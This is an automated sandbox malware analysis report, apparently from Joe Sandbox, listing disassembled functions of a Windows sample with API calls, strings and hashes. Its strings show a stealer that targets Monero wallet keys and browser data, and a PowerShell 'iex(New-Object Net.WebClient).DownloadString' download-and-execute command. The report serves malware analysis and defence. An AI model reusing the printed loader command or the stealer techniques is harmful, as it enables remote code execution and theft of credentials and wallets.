                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: ab9e54505057cf498ddbf3a75c7a907ca56dd556cc0eac82d6eafce628e623e8
                            • Instruction ID: d6de44da7b5bd71f261e53011aeeb92ed916f6a940696b7ae94ffa200b4f6877
                            • Opcode Fuzzy Hash: ab9e54505057cf498ddbf3a75c7a907ca56dd556cc0eac82d6eafce628e623e8
                            • Instruction Fuzzy Hash: 66014FB5A04308BBDB04DBE4EC49F6EBBB8EB89701F10C454FA0597290D7789904DB55
                            Function 00577720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0057773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C470,00000000,00020119,005776B9), ref: 0057775B
                            • RegQueryValueExA.ADVAPI32(005776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0057777A
                            • RegCloseKey.ADVAPI32(005776B9), ref: 00577784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 482e79c808f56633015848a059f457209663a1e683d836400126319254931199
                            • Instruction ID: b20e77ec38dd650415be314d83583786af60fa3b335df2dfa4d43f950cfe582a
                            • Opcode Fuzzy Hash: 482e79c808f56633015848a059f457209663a1e683d836400126319254931199
                            • Instruction Fuzzy Hash: DF0144B5A40308BBDB00DBE0DC49FBEB7B8EB88701F008154FA05A7281D7785500CB55
                            Function 005792E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:W,80000000,00000003,00000000,00000003,00000080,00000000,?,00573AEE,?), ref: 005792FC
                            • GetFileSizeEx.KERNEL32(000000FF,:W), ref: 00579319
                            • CloseHandle.KERNEL32(000000FF), ref: 00579327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :W$:W
                            • API String ID: 1378416451-2238429168
                            • Opcode ID: 489e7cc30001d401db2a31fa69466b89de9ded739333317e31eca5eff7ba45c5
                            • Instruction ID: 748e62062b24f8c1882492f54cad2ebcdc53cad73947bcdd5e0e83760f84f621
                            • Opcode Fuzzy Hash: 489e7cc30001d401db2a31fa69466b89de9ded739333317e31eca5eff7ba45c5
                            • Instruction Fuzzy Hash: D3F08C74E40208BBDB10DBB0EC08BAE7BB9FB88310F10CA54B615A72C0D6789600DB54
                            Function 005699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                            • LocalFree.KERNEL32(0056148F), ref: 00569A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 9b426f6cb016dbe81a44b26bbdfdbcef63039a1ac152e5c291743b09076e24f7
                            • Instruction ID: f098adb43e2c2394f43525629f0e1cd039356f60627a326e3637f31a5c857b0f
                            • Opcode Fuzzy Hash: 9b426f6cb016dbe81a44b26bbdfdbcef63039a1ac152e5c291743b09076e24f7
                            • Instruction Fuzzy Hash: 73311C74A00209EFDB14CF94D985BAE7BF9FF89340F108158E915A7390D778A941CFA1
                            Function 0057C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 07c0a9db2ea9926086bab15463b0ceb92192cf0a92e03949c4f7f05abf0d51fe
                            • Instruction ID: d588525a48b904c0a905c184408ffb82b466ffee88b7488bae5254f5710f12cc
                            • Opcode Fuzzy Hash: 07c0a9db2ea9926086bab15463b0ceb92192cf0a92e03949c4f7f05abf0d51fe
                            • Instruction Fuzzy Hash: 2241E7B110075C5EDB218B249C84BFB7FF9AF45704F1484ECEA8E86182D271AA44AF60
                            Function 00574780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,00E4E2C0), ref: 005747DB
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574801
                            • lstrcat.KERNEL32(?,?), ref: 00574820
                            • lstrcat.KERNEL32(?,?), ref: 00574834
                            • lstrcat.KERNEL32(?,00E3B9A0), ref: 00574847
                            • lstrcat.KERNEL32(?,?), ref: 0057485B
                            • lstrcat.KERNEL32(?,00E4D9A0), ref: 0057486F
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 00578D90: GetFileAttributesA.KERNEL32(00000000,?,00561B54,?,?,0058564C,?,?,00580E1F), ref: 00578D9F
                              • Part of subcall function 00574570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00574580
                              • Part of subcall function 00574570: RtlAllocateHeap.NTDLL(00000000), ref: 00574587
                              • Part of subcall function 00574570: wsprintfA.USER32 ref: 005745A6
                              • Part of subcall function 00574570: FindFirstFileA.KERNEL32(?,?), ref: 005745BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: ad8544512d62f749f8b208a6fde2cdeb4f83121f79d7489acafedede05110d55
                            • Instruction ID: a12b0f175bda02185f217538f7a11e1e6423cf48f73b53b50cd02a6b2d4116a4
                            • Opcode Fuzzy Hash: ad8544512d62f749f8b208a6fde2cdeb4f83121f79d7489acafedede05110d55
                            • Instruction Fuzzy Hash: 9C3161B294020967CB51FBB0EC8DEE97778BBD8700F408589B31996081EF789689DF95
                            Function 00572C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00572D85
                            Strings
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00572D04
                            • ')", xrefs: 00572CB3
                            • <, xrefs: 00572D39
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00572CC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: c35eb937ceedfdc1795b13f083efd8774ef5125900a5cc7df24ab1503c6feaa4
                            • Instruction ID: 191110d0c8d449fa2578fcd5a5dd1a5a97af0de836e583ec210c45abfa0a7446
                            • Opcode Fuzzy Hash: c35eb937ceedfdc1795b13f083efd8774ef5125900a5cc7df24ab1503c6feaa4
                            • Instruction Fuzzy Hash: 7141A171C101099ADB14FBA0D899FEEBF78BF94300F408119E51AB6191DF746A4ADF92
                            Function 00569E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00569F41
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: ed12a362f9152a83a5ac3ac219d153b0eade6979807be597f2f288581af2e0ac
                            • Instruction ID: 573049408416ba8c64ed266b4c86d7adf00c23492f959ee8e65a8badb209a5a6
                            • Opcode Fuzzy Hash: ed12a362f9152a83a5ac3ac219d153b0eade6979807be597f2f288581af2e0ac
                            • Instruction Fuzzy Hash: 3B613271A10249EBDB18EFA4DC99FED7B75BF84304F008418F90A6B191DB746A05CB52
                            Function 005770D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • memset.MSVCRT ref: 0057716A
                            Strings
                            • sW, xrefs: 00577111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0057718C
                            • sW, xrefs: 005772AE, 00577179, 0057717C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: sW$sW$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-4082360348
                            • Opcode ID: 5dcf2b5ce9a02a410ec66b319f73bcc4e981ce46157f1df117b5282bd7ad5a6c
                            • Instruction ID: 9e9d8d961b6cabc8f00beecb9a83a26ee8a7d44c2b7360cdaf1f75f846619026
                            • Opcode Fuzzy Hash: 5dcf2b5ce9a02a410ec66b319f73bcc4e981ce46157f1df117b5282bd7ad5a6c
                            • Instruction Fuzzy Hash: D451A3B0C0421D9BDB14EB90EC55BEEBB74BF88304F5084A8E51977182EB742E88DF55
                            Function 00577E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,00E3C278,00000000,00020119,?), ref: 00577E5E
                            • RegQueryValueExA.ADVAPI32(?,00E4D7A0,00000000,00000000,000000FF,000000FF), ref: 00577E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00577E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 831b1b4233f08f6c673e6f155da272a3d266e28e92b48e16380bf98da507e76c
                            • Instruction ID: 8c6af30cea3d2fa0c77dc691673d53f7c1af11356491d4ae086a42dea87eb9a0
                            • Opcode Fuzzy Hash: 831b1b4233f08f6c673e6f155da272a3d266e28e92b48e16380bf98da507e76c
                            • Instruction Fuzzy Hash: F8116AB1A44209FBD700CB94EC49FBBBBBCFB49B00F108119FA09A7280D7785804CBA1
                            Function 00579260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(00E4DFC0,?,?,?,0057140C,?,00E4DFC0,00000000), ref: 0057926C
                            • lstrcpyn.KERNEL32(007AAB88,00E4DFC0,00E4DFC0,?,0057140C,?,00E4DFC0), ref: 00579290
                            • lstrlen.KERNEL32(?,?,0057140C,?,00E4DFC0), ref: 005792A7
                            • wsprintfA.USER32 ref: 005792C7
                            Strings
                            Memory Dump Source
